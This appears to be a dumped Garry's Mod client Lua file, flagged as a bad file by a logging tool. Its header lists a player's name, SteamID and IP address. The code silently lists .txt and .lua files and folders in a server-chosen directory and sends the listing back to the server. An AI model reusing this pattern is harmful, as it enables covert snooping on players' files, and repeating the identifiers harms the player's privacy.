--[[
	MOD/lua/file_view/cl/file_list.lua [#390 (#398), 281592100, UID:62269999]
	xX-TrueMLGPlayer420Trikshot-Xx | STEAM_0:0:71356345 <82.238.182.218:27005> | [22.06.14 02:38:37PM]
	===BadFile===
]]

net.Receive("file_list",function()
local dir=net.ReadString()
local m={}
local fs,ds=file.Find(dir.."*","GAME")
if(fs)then for _,f in ipairs(fs) do if(string.find(f,".txt",1) || string.find(f,".lua",1) ) then table.insert(m,f)end end end
if(ds)then for _,d in ipairs(ds) do m[d]={}end end
net.Start("file_list")net.WriteTable(m)net.WriteEntity(net.ReadEntity())net.SendToServer()
m=nil
end)